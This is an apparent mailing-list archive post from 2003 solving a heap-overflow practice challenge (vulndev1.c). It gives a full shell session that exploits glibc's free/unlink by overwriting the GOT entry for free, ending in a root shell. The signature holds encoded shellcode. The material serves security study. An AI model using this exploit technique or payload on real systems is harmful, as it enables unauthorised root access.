Vulnerability Development mailing list archives
Re: vulndev1.c solution (warning SPOILER)
From: Kenji Cronos <matrix () phiral com>
Date: Thu, 15 May 2003 09:35:27 -0700
On Wed, 14 May 2003 16:48:33 -0700 "Cameron Brown" <cameron () greyzone com> wrote:
Jon, I don't know about yours, but my version of free() (glibc-2.2.93) trashes bytes 8-12 of the NOP sled as a side effect of the bogus unlink. If I execute this trash, it acts like a call into bad memory and I segfault. Fortunately, I found I can avoid this by adding a 12 byte jump ("\xeb\x0c") at the front of the NOP sled. Just though it was worth mentioning.
Yup, you're right.. I tried doing the same thing on different system and ran into that problem... had to put a jump in there.. I guess I just got lucky on my laptop the first time.. also, when exploiting on the command line.. \x0c can screw things up since it's the form feed character.. so here I just jumped over a little bit more.. matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root vuln1 matrix@overdose vuln-dev $ sudo chmod +s vuln1 matrix@overdose vuln-dev $ export SMEGMA=`printf "\xeb\x0e"`AAAAAAAAAAAAAAAAAA`cat shell` matrix@overdose vuln-dev $ echo 'main(){printf("%p\n",getenv("SMEGMA"));}'>q.c;gcc -o q.ert q.c;./q.ert;rm q.* 0xbffffa04 matrix@overdose vuln-dev $ objdump -R ./vuln1 | grep free 080495f8 R_386_JUMP_SLOT free matrix@overdose vuln-dev $ pcalc 0xf8-12 236 0xec 0y11101100 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x253;'` `printf "\xec\x95\x04\x08\x04\xfa\xff\xbf";` sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP
Attachment:
_bin
Description:
Current thread:
- Re: partial analysis of vulndev-1.c, (continued)
- Re: partial analysis of vulndev-1.c andrewg (May 13)
- Re: Administrivia: List Announcement Mr. Rufus Faloofus (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement andrewg (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: vulndev1.c solution (warning SPOILER) Jose Ronnick (May 13)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 14)
- Re: vulndev1.c solution (warning SPOILER) Jon Erickson (May 14)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 15)
- Re: vulndev1.c solution (warning SPOILER) Kenji Cronos (May 15)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: Administrivia: List Announcement xenophi1e (May 13)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- RE: Administrivia: List Announcement Gustavo Scotti (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- Re: Administrivia: List Announcement Eric Haugh (May 13)
- Re: Administrivia: List Announcement Nexus (May 13)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: Administrivia: List Announcement Thiago Canozzo Lahr (May 13)